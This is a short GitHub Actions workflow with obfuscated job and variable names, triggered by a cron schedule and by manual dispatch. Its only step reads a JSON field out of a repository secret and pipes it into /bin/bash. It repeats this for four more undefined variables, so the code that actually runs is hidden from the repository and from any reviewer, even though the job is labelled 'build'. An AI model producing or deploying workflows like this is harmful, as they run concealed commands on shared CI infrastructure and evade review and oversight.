name: qimutou9183

on:
  workflow_dispatch:
  schedule:
    - cron: '3 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qimutou9183
        env:
          vq877: ${{ secrets.vq877 }}
        run: |
          echo $vq877 | jq -r .f23402 | /bin/bash
          echo $jx14240 | jq -r .dzxey35548 | /bin/bash
          echo $bjc87041 | jq -r .i94555 | /bin/bash
          echo $ueshl64592 | jq -r .lp8 | /bin/bash
          echo $g86809 | jq -r .srxy555 | /bin/bash

